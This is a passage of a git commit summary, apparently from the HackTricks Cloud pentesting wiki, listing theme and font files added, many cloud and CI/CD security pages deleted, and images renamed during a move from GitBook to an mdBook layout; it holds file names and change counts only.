| 484 ++++++++ theme/favicon.png | Bin 0 -> 14122 bytes theme/favicon.svg 
| 21 + theme/fonts/OPEN-SANS-LICENSE.txt | 202 +++ theme/fonts/SOURCE-CODE-PRO-LICENSE.txt | 93 ++ theme/fonts/fonts.css | 100 ++ .../open-sans-v17-all-charsets-300.woff2 | Bin 0 -> 44352 bytes ...open-sans-v17-all-charsets-300italic.woff2 | Bin 0 -> 40656 bytes .../open-sans-v17-all-charsets-600.woff2 | Bin 0 -> 44936 bytes ...open-sans-v17-all-charsets-600italic.woff2 | Bin 0 -> 42120 bytes .../open-sans-v17-all-charsets-700.woff2 | Bin 0 -> 44988 bytes ...open-sans-v17-all-charsets-700italic.woff2 | Bin 0 -> 40800 bytes .../open-sans-v17-all-charsets-800.woff2 | Bin 0 -> 44536 bytes ...open-sans-v17-all-charsets-800italic.woff2 | Bin 0 -> 40812 bytes .../open-sans-v17-all-charsets-italic.woff2 | Bin 0 -> 41076 bytes .../open-sans-v17-all-charsets-regular.woff2 | Bin 0 -> 43236 bytes ...source-code-pro-v11-all-charsets-500.woff2 | Bin 0 -> 59140 bytes theme/highlight.css | 84 ++ theme/highlight.js | 54 + theme/ht_searcher.js | 486 ++++++++ theme/index.hbs | 392 ++++++ theme/pagetoc.css | 189 +++ theme/pagetoc.js | 68 ++ theme/sponsor.js | 58 + theme/tabs.css | 41 + theme/tabs.js | 75 ++ theme/toc.js.hbs | 73 ++ 1373 files changed, 26143 insertions(+), 34152 deletions(-) delete mode 100644 .gitbook/assets/empty.zip delete mode 100644 README.md delete mode 100644 SUMMARY.md create mode 100644 book.toml create mode 100644 hacktricks-preprocessor.py delete mode 100644 pentesting-ci-cd/apache-airflow-security/airflow-configuration.md delete mode 100644 pentesting-ci-cd/cloudflare-security/README.md delete mode 100644 pentesting-ci-cd/cloudflare-security/cloudflare-domains.md delete mode 100644 pentesting-ci-cd/cloudflare-security/cloudflare-zero-trust-network.md delete mode 100644 pentesting-ci-cd/concourse-security/README.md delete mode 100644 pentesting-ci-cd/concourse-security/concourse-architecture.md delete mode 100644 pentesting-ci-cd/gitea-security/basic-gitea-information.md delete mode 100644 
pentesting-ci-cd/github-security/accessible-deleted-data-in-github.md delete mode 100644 pentesting-ci-cd/jenkins-security/jenkins-arbitrary-file-read-to-rce-via-remember-me.md delete mode 100644 pentesting-ci-cd/jenkins-security/jenkins-rce-creating-modifying-pipeline.md delete mode 100644 pentesting-ci-cd/jenkins-security/jenkins-rce-creating-modifying-project.md delete mode 100644 pentesting-ci-cd/jenkins-security/jenkins-rce-with-groovy-script.md delete mode 100644 pentesting-ci-cd/todo.md delete mode 100644 pentesting-ci-cd/travisci-security/README.md delete mode 100644 pentesting-ci-cd/vercel-security.md delete mode 100644 pentesting-cloud/aws-security/aws-permissions-for-a-pentest.md delete mode 100644 pentesting-cloud/aws-security/aws-persistence/aws-api-gateway-persistence.md delete mode 100644 pentesting-cloud/aws-security/aws-persistence/aws-cognito-persistence.md delete mode 100644 pentesting-cloud/aws-security/aws-persistence/aws-dynamodb-persistence.md delete mode 100644 pentesting-cloud/aws-security/aws-persistence/aws-ec2-persistence.md delete mode 100644 pentesting-cloud/aws-security/aws-persistence/aws-ecr-persistence.md delete mode 100644 pentesting-cloud/aws-security/aws-persistence/aws-efs-persistence.md delete mode 100644 pentesting-cloud/aws-security/aws-persistence/aws-iam-persistence.md delete mode 100644 pentesting-cloud/aws-security/aws-persistence/aws-kms-persistence.md delete mode 100644 pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/README.md delete mode 100644 pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/aws-abusing-lambda-extensions.md delete mode 100644 pentesting-cloud/aws-security/aws-persistence/aws-lightsail-persistence.md delete mode 100644 pentesting-cloud/aws-security/aws-persistence/aws-rds-persistence.md delete mode 100644 pentesting-cloud/aws-security/aws-persistence/aws-s3-persistence.md delete mode 100644 
pentesting-cloud/aws-security/aws-persistence/aws-secrets-manager-persistence.md delete mode 100644 pentesting-cloud/aws-security/aws-persistence/aws-sns-persistence.md delete mode 100644 pentesting-cloud/aws-security/aws-persistence/aws-sqs-persistence.md delete mode 100644 pentesting-cloud/aws-security/aws-persistence/aws-step-functions-persistence.md delete mode 100644 pentesting-cloud/aws-security/aws-post-exploitation/aws-cloudfront-post-exploitation.md delete mode 100644 pentesting-cloud/aws-security/aws-post-exploitation/aws-codebuild-post-exploitation/README.md delete mode 100644 pentesting-cloud/aws-security/aws-post-exploitation/aws-codebuild-post-exploitation/aws-codebuild-token-leakage.md delete mode 100644 pentesting-cloud/aws-security/aws-post-exploitation/aws-control-tower-post-exploitation.md delete mode 100644 pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/aws-malicious-vpc-mirror.md delete mode 100644 pentesting-cloud/aws-security/aws-post-exploitation/aws-ecs-post-exploitation.md delete mode 100644 pentesting-cloud/aws-security/aws-post-exploitation/aws-efs-post-exploitation.md delete mode 100644 pentesting-cloud/aws-security/aws-post-exploitation/aws-elastic-beanstalk-post-exploitation.md delete mode 100644 pentesting-cloud/aws-security/aws-post-exploitation/aws-iam-post-exploitation.md delete mode 100644 pentesting-cloud/aws-security/aws-post-exploitation/aws-kms-post-exploitation.md delete mode 100644 pentesting-cloud/aws-security/aws-post-exploitation/aws-lambda-post-exploitation/README.md delete mode 100644 pentesting-cloud/aws-security/aws-post-exploitation/aws-lambda-post-exploitation/aws-warm-lambda-persistence.md delete mode 100644 pentesting-cloud/aws-security/aws-post-exploitation/aws-lightsail-post-exploitation.md delete mode 100644 pentesting-cloud/aws-security/aws-post-exploitation/aws-organizations-post-exploitation.md delete mode 100644 
pentesting-cloud/aws-security/aws-post-exploitation/aws-secrets-manager-post-exploitation.md delete mode 100644 pentesting-cloud/aws-security/aws-post-exploitation/aws-ses-post-exploitation.md delete mode 100644 pentesting-cloud/aws-security/aws-post-exploitation/aws-sso-and-identitystore-post-exploitation.md delete mode 100644 pentesting-cloud/aws-security/aws-post-exploitation/aws-stepfunctions-post-exploitation.md delete mode 100644 pentesting-cloud/aws-security/aws-post-exploitation/aws-vpn-post-exploitation.md delete mode 100644 pentesting-cloud/aws-security/aws-privilege-escalation/README.md delete mode 100644 pentesting-cloud/aws-security/aws-privilege-escalation/aws-chime-privesc.md delete mode 100644 pentesting-cloud/aws-security/aws-privilege-escalation/aws-cloudformation-privesc/iam-passrole-cloudformation-createstack-and-cloudformation-describestacks.md delete mode 100644 pentesting-cloud/aws-security/aws-privilege-escalation/aws-codepipeline-privesc.md delete mode 100644 pentesting-cloud/aws-security/aws-privilege-escalation/aws-codestar-privesc/README.md delete mode 100644 pentesting-cloud/aws-security/aws-privilege-escalation/aws-codestar-privesc/codestar-createproject-codestar-associateteammember.md delete mode 100644 pentesting-cloud/aws-security/aws-privilege-escalation/aws-codestar-privesc/iam-passrole-codestar-createproject.md delete mode 100644 pentesting-cloud/aws-security/aws-privilege-escalation/aws-datapipeline-privesc.md delete mode 100644 pentesting-cloud/aws-security/aws-privilege-escalation/aws-directory-services-privesc.md delete mode 100644 pentesting-cloud/aws-security/aws-privilege-escalation/aws-dynamodb-privesc.md delete mode 100644 pentesting-cloud/aws-security/aws-privilege-escalation/aws-ebs-privesc.md delete mode 100644 pentesting-cloud/aws-security/aws-privilege-escalation/aws-ecr-privesc.md delete mode 100644 pentesting-cloud/aws-security/aws-privilege-escalation/aws-emr-privesc.md delete mode 100644 
pentesting-cloud/aws-security/aws-privilege-escalation/aws-gamelift.md delete mode 100644 pentesting-cloud/aws-security/aws-privilege-escalation/aws-kms-privesc.md delete mode 100644 pentesting-cloud/aws-security/aws-privilege-escalation/aws-mediapackage-privesc.md delete mode 100644 pentesting-cloud/aws-security/aws-privilege-escalation/aws-mq-privesc.md delete mode 100644 pentesting-cloud/aws-security/aws-privilege-escalation/aws-msk-privesc.md delete mode 100644 pentesting-cloud/aws-security/aws-privilege-escalation/aws-organizations-prinvesc.md delete mode 100644 pentesting-cloud/aws-security/aws-privilege-escalation/aws-redshift-privesc.md delete mode 100644 pentesting-cloud/aws-security/aws-privilege-escalation/aws-secrets-manager-privesc.md delete mode 100644 pentesting-cloud/aws-security/aws-privilege-escalation/aws-sns-privesc.md delete mode 100644 pentesting-cloud/aws-security/aws-privilege-escalation/aws-sqs-privesc.md delete mode 100644 pentesting-cloud/aws-security/aws-privilege-escalation/aws-sts-privesc.md delete mode 100644 pentesting-cloud/aws-security/aws-privilege-escalation/eventbridgescheduler-privesc.md delete mode 100644 pentesting-cloud/aws-security/aws-privilege-escalation/route53-createhostedzone-route53-changeresourcerecordsets-acm-pca-issuecertificate-acm-pca-getcer.md delete mode 100644 pentesting-cloud/aws-security/aws-services/README.md delete mode 100644 pentesting-cloud/aws-security/aws-services/aws-cloudformation-and-codestar-enum.md delete mode 100644 pentesting-cloud/aws-security/aws-services/aws-cloudfront-enum.md delete mode 100644 pentesting-cloud/aws-security/aws-services/aws-codebuild-enum.md delete mode 100644 pentesting-cloud/aws-security/aws-services/aws-cognito-enum/README.md delete mode 100644 pentesting-cloud/aws-security/aws-services/aws-documentdb-enum.md delete mode 100644 pentesting-cloud/aws-security/aws-services/aws-ecr-enum.md delete mode 100644 pentesting-cloud/aws-security/aws-services/aws-ecs-enum.md delete 
mode 100644 pentesting-cloud/aws-security/aws-services/aws-eks-enum.md delete mode 100644 pentesting-cloud/aws-security/aws-services/aws-elasticache.md delete mode 100644 pentesting-cloud/aws-security/aws-services/aws-emr-enum.md delete mode 100644 pentesting-cloud/aws-security/aws-services/aws-kinesis-data-firehose-enum.md delete mode 100644 pentesting-cloud/aws-security/aws-services/aws-kms-enum.md delete mode 100644 pentesting-cloud/aws-security/aws-services/aws-lightsail-enum.md delete mode 100644 pentesting-cloud/aws-security/aws-services/aws-mq-enum.md delete mode 100644 pentesting-cloud/aws-security/aws-services/aws-organizations-enum.md delete mode 100644 pentesting-cloud/aws-security/aws-services/aws-other-services-enum.md delete mode 100644 pentesting-cloud/aws-security/aws-services/aws-route53-enum.md delete mode 100644 pentesting-cloud/aws-security/aws-services/aws-secrets-manager-enum.md delete mode 100644 pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-control-tower-enum.md delete mode 100644 pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cost-explorer-enum.md delete mode 100644 pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-detective-enum.md delete mode 100644 pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-macie-enum.md delete mode 100644 pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-security-hub-enum.md delete mode 100644 pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-shield-enum.md delete mode 100644 pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-trusted-advisor-enum.md delete mode 100644 pentesting-cloud/aws-security/aws-services/aws-sns-enum.md delete mode 100644 pentesting-cloud/aws-security/aws-services/aws-sqs-and-sns-enum.md delete mode 100644 
pentesting-cloud/aws-security/aws-services/aws-sts-enum.md delete mode 100644 pentesting-cloud/aws-security/aws-services/eventbridgescheduler-enum.md delete mode 100644 pentesting-cloud/aws-security/aws-unauthenticated-enum-access/README.md delete mode 100644 pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-accounts-unauthenticated-enum.md delete mode 100644 pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-api-gateway-unauthenticated-enum.md delete mode 100644 pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-cloudfront-unauthenticated-enum.md delete mode 100644 pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-codebuild-unauthenticated-access.md delete mode 100644 pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-documentdb-enum.md delete mode 100644 pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-dynamodb-unauthenticated-access.md delete mode 100644 pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-ec2-unauthenticated-enum.md delete mode 100644 pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-ecr-unauthenticated-enum.md delete mode 100644 pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-ecs-unauthenticated-enum.md delete mode 100644 pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-elastic-beanstalk-unauthenticated-enum.md delete mode 100644 pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-elasticsearch-unauthenticated-enum.md delete mode 100644 pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-iot-unauthenticated-enum.md delete mode 100644 pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-kinesis-video-unauthenticated-enum.md delete mode 100644 pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-lambda-unauthenticated-access.md delete mode 100644 
pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-media-unauthenticated-enum.md delete mode 100644 pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-mq-unauthenticated-enum.md delete mode 100644 pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-msk-unauthenticated-enum.md delete mode 100644 pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-rds-unauthenticated-enum.md delete mode 100644 pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-redshift-unauthenticated-enum.md delete mode 100644 pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-sns-unauthenticated-enum.md delete mode 100644 pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-sqs-unauthenticated-enum.md delete mode 100644 pentesting-cloud/azure-security/az-device-registration.md delete mode 100644 pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/README.md delete mode 100644 pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-local-cloud-credentials.md delete mode 100644 pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-pass-the-certificate.md delete mode 100644 pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-pass-the-cookie.md delete mode 100644 pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-phishing-primary-refresh-token-microsoft-entra.md delete mode 100644 pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-primary-refresh-token-prt.md delete mode 100644 pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-processes-memory-access-token.md delete mode 100644 pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/README.md delete mode 100644 pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/az-default-applications.md delete mode 100644 
pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/az-synchronising-new-users.md delete mode 100644 pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/pta-pass-through-authentication.md delete mode 100644 pentesting-cloud/azure-security/az-permissions-for-a-pentest.md delete mode 100644 pentesting-cloud/azure-security/az-persistence/az-queue-persistance.md delete mode 100644 pentesting-cloud/azure-security/az-persistence/az-storage-persistence.md delete mode 100644 pentesting-cloud/azure-security/az-persistence/az-vms-persistence.md delete mode 100644 pentesting-cloud/azure-security/az-post-exploitation/az-blob-storage-post-exploitation.md delete mode 100644 pentesting-cloud/azure-security/az-post-exploitation/az-file-share-post-exploitation.md delete mode 100644 pentesting-cloud/azure-security/az-post-exploitation/az-function-apps-post-exploitation.md delete mode 100644 pentesting-cloud/azure-security/az-post-exploitation/az-table-storage-post-exploitation.md delete mode 100644 pentesting-cloud/azure-security/az-privilege-escalation/az-app-services-privesc.md delete mode 100644 pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/dynamic-groups.md delete mode 100644 pentesting-cloud/azure-security/az-privilege-escalation/az-key-vault-privesc.md delete mode 100644 pentesting-cloud/azure-security/az-services/README.md delete mode 100644 pentesting-cloud/azure-security/az-services/az-acr.md delete mode 100644 pentesting-cloud/azure-security/az-services/az-application-proxy.md delete mode 100644 pentesting-cloud/azure-security/az-services/az-arm-templates.md delete mode 100644 pentesting-cloud/azure-security/az-services/az-automation-account/az-state-configuration-rce.md delete mode 100644 pentesting-cloud/azure-security/az-services/az-management-groups-subscriptions-and-resource-groups.md delete mode 100644 
pentesting-cloud/azure-security/az-services/az-queue-enum.md delete mode 100644 pentesting-cloud/azure-security/az-services/az-table-storage.md delete mode 100644 pentesting-cloud/azure-security/az-services/intune.md delete mode 100644 pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-device-code-authentication-phishing.md delete mode 100644 pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-password-spraying.md delete mode 100644 pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-vms-unath.md delete mode 100644 pentesting-cloud/digital-ocean-pentesting/README.md delete mode 100644 pentesting-cloud/digital-ocean-pentesting/do-permissions-for-a-pentest.md delete mode 100644 pentesting-cloud/digital-ocean-pentesting/do-services/README.md delete mode 100644 pentesting-cloud/digital-ocean-pentesting/do-services/do-apps.md delete mode 100644 pentesting-cloud/digital-ocean-pentesting/do-services/do-container-registry.md delete mode 100644 pentesting-cloud/digital-ocean-pentesting/do-services/do-databases.md delete mode 100644 pentesting-cloud/digital-ocean-pentesting/do-services/do-functions.md delete mode 100644 pentesting-cloud/digital-ocean-pentesting/do-services/do-images.md delete mode 100644 pentesting-cloud/digital-ocean-pentesting/do-services/do-kubernetes-doks.md delete mode 100644 pentesting-cloud/digital-ocean-pentesting/do-services/do-networking.md delete mode 100644 pentesting-cloud/digital-ocean-pentesting/do-services/do-projects.md delete mode 100644 pentesting-cloud/digital-ocean-pentesting/do-services/do-spaces.md delete mode 100644 pentesting-cloud/digital-ocean-pentesting/do-services/do-volumes.md delete mode 100644 pentesting-cloud/gcp-security/gcp-basic-information/gcp-federation-abuse.md delete mode 100644 pentesting-cloud/gcp-security/gcp-persistence/gcp-api-keys-persistence.md delete mode 100644 pentesting-cloud/gcp-security/gcp-persistence/gcp-app-engine-persistence.md 
delete mode 100644 pentesting-cloud/gcp-security/gcp-persistence/gcp-artifact-registry-persistence.md delete mode 100644 pentesting-cloud/gcp-security/gcp-persistence/gcp-bigquery-persistence.md delete mode 100644 pentesting-cloud/gcp-security/gcp-persistence/gcp-cloud-functions-persistence.md delete mode 100644 pentesting-cloud/gcp-security/gcp-persistence/gcp-cloud-run-persistence.md delete mode 100644 pentesting-cloud/gcp-security/gcp-persistence/gcp-cloud-shell-persistence.md delete mode 100644 pentesting-cloud/gcp-security/gcp-persistence/gcp-cloud-sql-persistence.md delete mode 100644 pentesting-cloud/gcp-security/gcp-persistence/gcp-compute-persistence.md delete mode 100644 pentesting-cloud/gcp-security/gcp-persistence/gcp-dataflow-persistence.md delete mode 100644 pentesting-cloud/gcp-security/gcp-persistence/gcp-filestore-persistence.md delete mode 100644 pentesting-cloud/gcp-security/gcp-persistence/gcp-logging-persistence.md delete mode 100644 pentesting-cloud/gcp-security/gcp-persistence/gcp-secret-manager-persistence.md delete mode 100644 pentesting-cloud/gcp-security/gcp-persistence/gcp-storage-persistence.md delete mode 100644 pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-app-engine-post-exploitation.md delete mode 100644 pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-artifact-registry-post-exploitation.md delete mode 100644 pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-build-post-exploitation.md delete mode 100644 pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-run-post-exploitation.md delete mode 100644 pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-filestore-post-exploitation.md delete mode 100644 pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-iam-post-exploitation.md delete mode 100644 pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-monitoring-post-exploitation.md delete mode 100644 pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-secretmanager-post-exploitation.md 
delete mode 100644 pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-security-post-exploitation.md delete mode 100644 pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-storage-post-exploitation.md delete mode 100644 pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-workflows-post-exploitation.md delete mode 100644 pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-apikeys-privesc.md delete mode 100644 pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-artifact-registry-privesc.md delete mode 100644 pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-batch-privesc.md delete mode 100644 pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-clientauthconfig-privesc.md delete mode 100644 pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudidentity-privesc.md delete mode 100644 pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-compute-privesc/gcp-add-custom-ssh-metadata.md delete mode 100644 pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-container-privesc.md delete mode 100644 pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-deploymentmaneger-privesc.md delete mode 100644 pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-misc-perms-privesc.md delete mode 100644 pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-orgpolicy-privesc.md delete mode 100644 pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-pubsub-privesc.md delete mode 100644 pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-resourcemanager-privesc.md delete mode 100644 pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-secretmanager-privesc.md delete mode 100644 pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-sourcerepos-privesc.md delete mode 100644 pentesting-cloud/gcp-security/gcp-services/gcp-ai-platform-enum.md delete mode 100644 pentesting-cloud/gcp-security/gcp-services/gcp-api-keys-enum.md delete mode 100644 
pentesting-cloud/gcp-security/gcp-services/gcp-batch-enum.md delete mode 100644 pentesting-cloud/gcp-security/gcp-services/gcp-bigtable-enum.md delete mode 100644 pentesting-cloud/gcp-security/gcp-services/gcp-cloud-build-enum.md delete mode 100644 pentesting-cloud/gcp-security/gcp-services/gcp-cloud-functions-enum.md delete mode 100644 pentesting-cloud/gcp-security/gcp-services/gcp-cloud-run-enum.md delete mode 100644 pentesting-cloud/gcp-security/gcp-services/gcp-cloud-scheduler-enum.md delete mode 100644 pentesting-cloud/gcp-security/gcp-services/gcp-cloud-shell-enum.md delete mode 100644 pentesting-cloud/gcp-security/gcp-services/gcp-cloud-sql-enum.md delete mode 100644 pentesting-cloud/gcp-security/gcp-services/gcp-composer-enum.md delete mode 100644 pentesting-cloud/gcp-security/gcp-services/gcp-dns-enum.md delete mode 100644 pentesting-cloud/gcp-security/gcp-services/gcp-filestore-enum.md delete mode 100644 pentesting-cloud/gcp-security/gcp-services/gcp-firestore-enum.md delete mode 100644 pentesting-cloud/gcp-security/gcp-services/gcp-memorystore-enum.md delete mode 100644 pentesting-cloud/gcp-security/gcp-services/gcp-monitoring-enum.md delete mode 100644 pentesting-cloud/gcp-security/gcp-services/gcp-secrets-manager-enum.md delete mode 100644 pentesting-cloud/gcp-security/gcp-services/gcp-source-repositories-enum.md delete mode 100644 pentesting-cloud/gcp-security/gcp-services/gcp-spanner-enum.md delete mode 100644 pentesting-cloud/gcp-security/gcp-services/gcp-stackdriver-enum.md delete mode 100644 pentesting-cloud/gcp-security/gcp-services/gcp-workflows-enum.md delete mode 100644 pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/README.md delete mode 100644 pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-api-keys-unauthenticated-enum.md delete mode 100644 pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-app-engine-unauthenticated-enum.md delete mode 100644 
pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-artifact-registry-unauthenticated-enum.md delete mode 100644 pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-cloud-build-unauthenticated-enum.md delete mode 100644 pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-cloud-functions-unauthenticated-enum.md delete mode 100644 pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-cloud-run-unauthenticated-enum.md delete mode 100644 pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-cloud-sql-unauthenticated-enum.md delete mode 100644 pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-compute-unauthenticated-enum.md delete mode 100644 pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-source-repositories-unauthenticated-enum.md delete mode 100644 pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-storage-unauthenticated-enum/README.md delete mode 100644 pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-storage-unauthenticated-enum/gcp-public-buckets-privilege-escalation.md delete mode 100644 pentesting-cloud/ibm-cloud-pentesting/README.md delete mode 100644 pentesting-cloud/ibm-cloud-pentesting/ibm-basic-information.md delete mode 100644 pentesting-cloud/kubernetes-security/README.md delete mode 100644 pentesting-cloud/kubernetes-security/abusing-roles-clusterroles-in-kubernetes/pod-escape-privileges.md delete mode 100644 pentesting-cloud/kubernetes-security/kubernetes-namespace-escalation.md delete mode 100644 pentesting-cloud/openshift-pentesting/README.md delete mode 100644 pentesting-cloud/openshift-pentesting/openshift-privilege-escalation/README.md delete mode 100644 pentesting-cloud/workspace-security/README.md delete mode 100644 pentesting-cloud/workspace-security/gws-google-platforms-phishing/gws-app-scripts.md delete mode 100644 pentesting-cloud/workspace-security/gws-persistence.md delete 
mode 100644 pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/README.md create mode 100644 src/README.md create mode 100644 src/SUMMARY.md create mode 100644 src/banners/hacktricks-training.md rename {.gitbook/assets => src/images}/05-constraints.png (100%) rename {.gitbook/assets => src/images}/2023-03-06 17_02_47-.png (100%) rename {.gitbook/assets => src/images}/2023-03-06 17_11_28-Window.png (100%) rename {.gitbook/assets => src/images}/2023-03-06 17_11_43-Window.png (100%) rename {.gitbook/assets => src/images}/2023-03-06 17_28_26-Window.png (100%) rename {.gitbook/assets => src/images}/2023-03-06 17_28_50-Window.png (100%) rename {.gitbook/assets => src/images}/CLOUD-logo-letters.svg (100%) create mode 100644 src/images/CLOUD-web-logo.png create mode 100644 src/images/HT-TRAINING-web-logo.png rename {.gitbook/assets => src/images}/Imagen13.png (100%) rename {.gitbook/assets => src/images}/Imagen14.png (100%) rename {.gitbook/assets => src/images}/Kyverno.png (100%) rename {.gitbook/assets => src/images}/Managing SCCs in OpenShift-1.png (100%) rename {.gitbook/assets => src/images}/Openshift-RunLevel4.png (100%) create mode 100644 src/images/arte.png rename {.gitbook/assets => src/images}/cloud gif.gif (100%) rename {.gitbook/assets => src/images}/cloud.gif (100%) create mode 100644 src/images/grte.png rename {.gitbook/assets => src/images}/hc (1) (1).png (100%) rename {.gitbook/assets => src/images}/hc (1).png (100%) rename {.gitbook/assets => src/images}/hc (2) (1).png (100%) rename {.gitbook/assets => src/images}/hc (2).png (100%) rename {.gitbook/assets => src/images}/hc (3).png (100%) rename {.gitbook/assets => src/images}/hc (4).png (100%) rename {.gitbook/assets => src/images}/hc.jpeg (100%) rename {.gitbook/assets => src/images}/hc.png (100%) rename {.gitbook/assets => src/images}/image (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png (100%) 
rename {.gitbook/assets => src/images}/image (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png (100%) rename {.gitbook/assets => src/images}/image (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png (100%) rename {.gitbook/assets => src/images}/image (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png (100%) rename {.gitbook/assets => src/images}/image (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png (100%) rename {.gitbook/assets => src/images}/image (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png (100%) rename {.gitbook/assets => src/images}/image (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png (100%) rename {.gitbook/assets => src/images}/image (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png (100%) rename {.gitbook/assets => src/images}/image (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png (100%) rename {.gitbook/assets => src/images}/image (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png (100%) rename {.gitbook/assets => src/images}/image (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png (100%) rename {.gitbook/assets => src/images}/image (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png (100%) rename {.gitbook/assets => src/images}/image (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png (100%) rename {.gitbook/assets => src/images}/image (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png (100%) rename {.gitbook/assets => src/images}/image (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png (100%) rename {.gitbook/assets => src/images}/image (1) (1) (1) (1) (1) (1) (1) (1) (1).png (100%) rename {.gitbook/assets => src/images}/image (1) (1) (1) (1) (1) 